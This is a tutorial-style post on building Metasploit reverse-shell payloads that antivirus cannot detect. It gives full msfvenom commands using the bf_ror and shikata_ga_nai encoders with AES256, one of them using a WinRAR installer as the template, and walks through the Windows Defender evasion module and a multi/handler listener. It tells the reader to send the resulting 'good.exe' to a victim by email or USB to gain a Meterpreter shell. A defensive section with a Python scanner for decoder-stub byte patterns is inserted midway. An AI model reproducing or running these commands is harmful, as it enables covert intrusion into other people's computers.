Use of Encoders and Evasions in Metasploit | Creating Encoded/Undetectable Payload in Metasploit | FUD Payload in Metasploit | Kali Linux Tools

Use of Encoders in Metasploit:

Now we will look at two examples of using encoders. We will learn how to use a specific encoder to encode our payload so that the victim's antivirus software does not detect it.

1) GENERATING AN ENCODED PAYLOAD USING THE (BF_XOR) ENCODER:

We can create an encoded payload with the following command:

(msfvenom -p + payload LHOST= + ip of kali Linux LPORT= + port -f + file type -x + filename.exe -f + file type -e + encoder -o + path of file to save) e.g. (msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=8081 -f rar -x wrar531.exe -f exe-only -e x86/bf_ror -o /root/Desktop/file.exe)

Now, when you send this payload to your victim, the antivirus software does not detect it.

2) GENERATING AN (AES256)-ENCRYPTED PAYLOAD USING THE (SHIKATA_GA_NAI) ENCODER:

We can generate an (aes256)-encrypted payload with the following command:

(msfvenom -p + payload --platform + operating system -a + architecture LHOST= + ip of kali Linux to control LPORT= + port -f + file format -e + encoder -i + number of encoding iterations --encrypt + encryption type -o + file path to save) e.g.

(msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=192.168.1.9 LPORT=443 -f exe -e x86/shikata_ga_nai -i 15 --encrypt aes256 -o /root/Desktop/file.exe)

Metasploit has many encoders that you can use to encode or encrypt your payloads to bypass antivirus software. You should try the best encoders; they are all used the same way as shown above. So, best of luck with the encoders.
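From the defender's side it is worth seeing why encoding alone is a weak bypass. A polymorphic encoder changes the encoded body on every run, but the small decoder stub placed in front of it must first find its own address in memory, and the classic x86 ways of doing that (the fnstenv trick that shikata_ga_nai is known for, and the call $+5 trick) leave fixed byte sequences that scanners and YARA rules key on. The following Python scanner is an added example, not code from the original post or from the Metasploit project; the sample blob it scans is constructed here and contains no real payload, only a stub skeleton and filler.

```python
"""Heuristic scan for x86 decoder-stub 'GetPC' sequences (added example).

Constructed fixture, not a real payload: the 'encoded body' is filler bytes.
"""
from __future__ import annotations

# fnstenv [esp-0xC] stores the FPU environment, including the address of the
# last FPU instruction executed; a following 'pop reg' yields an address inside
# the stub. Fixed encoding: D9 74 24 F4.
FNSTENV_GETPC = bytes.fromhex("d97424f4")

# call $+5 (E8 00 00 00 00) pushes the address of the next instruction, which
# the stub then pops into a register.
CALL_NEXT_GETPC = bytes.fromhex("e800000000")

# 'pop r32' is a single opcode byte 0x58..0x5F (pop eax .. pop edi).
REG_NAMES = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
POP_R32 = set(range(0x58, 0x60))

# Constructed sample: NOP filler, an FPU instruction (fldz), the fnstenv GetPC
# stub, 'pop ebx', filler standing in for the encoded body, and then a second
# stub style (call $+5; pop esi) so both heuristics are exercised.
SAMPLE_BLOB = (
    b"\x90" * 8                  # offsets 0-7: NOP filler (constructed)
    + b"\xd9\xee"                # offsets 8-9: fldz, sets the "last FPU ip"
    + FNSTENV_GETPC              # offsets 10-13: fnstenv [esp-0xC]
    + b"\x5b"                    # offset 14: pop ebx -> GetPC
    + b"\x41" * 16               # offsets 15-30: filler for the encoded body
    + CALL_NEXT_GETPC            # offsets 31-35: call $+5
    + b"\x5e"                    # offset 36: pop esi -> GetPC
)


def _first_pop(chunk: bytes) -> str | None:
    """Return the register name of the first 'pop r32' in chunk, if any."""
    for b in chunk:
        if b in POP_R32:
            return REG_NAMES[b - 0x58]
    return None


def find_getpc_stubs(data: bytes) -> list[dict]:
    """Return hits as dicts with offset, technique and the popped register.

    fnstenv: a 'pop r32' must follow within 4 bytes (junk may be interleaved).
    call $+5: a 'pop r32' must follow immediately.
    """
    hits = []
    for off in range(len(data)):
        window = data[off:]
        if window.startswith(FNSTENV_GETPC):
            n = len(FNSTENV_GETPC)
            pop = _first_pop(window[n:n + 4])
            if pop is not None:
                hits.append({"offset": off, "technique": "fnstenv", "pop": pop})
        elif window.startswith(CALL_NEXT_GETPC):
            n = len(CALL_NEXT_GETPC)
            pop = _first_pop(window[n:n + 1])
            if pop is not None:
                hits.append({"offset": off, "technique": "call_next", "pop": pop})
    return hits


if __name__ == "__main__":
    for hit in find_getpc_stubs(SAMPLE_BLOB):
        print(f"offset {hit['offset']:#06x}: {hit['technique']} GetPC, pop {hit['pop']}")
```

Run against any file's bytes, the scanner reports where a stub-style GetPC sequence appears. Real engines combine such byte heuristics with emulation of the decoder loop and with behavioural monitoring once the payload runs, which is why a high iteration count on an encoder changes little for detection.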

Use of Evasions in Metasploit:

These are also modules in Metasploit, used to bypass the victim's antivirus software in order to hack the victim's system. We must use them during hacking. An evasion module works like an exploit, but we do not need to encode our payload to bypass the antivirus software; it bypasses the antivirus directly. However, the antivirus we are bypassing must be running on the target system when the victim runs our payload, and each evasion module is specific to a particular antivirus product. Now we will see an example of using an evasion module.

BYPASSING THE WINDOWS DEFENDER ANTIVIRUS SOFTWARE USING EVASION:

Windows Defender is the default antivirus software of the Windows OS that keeps our computer clean. Now we will use an evasion module in Metasploit to bypass it. Follow these steps.

First, set up the evasion module with the following commands:

(use evasion/windows/windows_defender_exe)

(show options)

(set FILENAME + file name with path to save) e.g.

(set FILENAME /root/Desktop/good.exe)

(set PAYLOAD + payload to control) e.g.

(set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g.

(set LHOST 192.168.8.4)

(exploit)

The file will be created on the Desktop with the name (good.exe). Send this file to the victim by email or USB.

Now set up the handler for the reverse connection with the following commands:

(use exploit/multi/handler)

(set LHOST + ip of kali Linux) e.g.

(set LHOST 192.168.8.4)

(set LPORT + port to control) e.g.

(set LPORT 4444)

(exploit)

Now, when the victim runs your file (good.exe) on a system protected by Windows Defender, your payload will not be detected and you will get a Meterpreter shell to control the victim's Windows system.
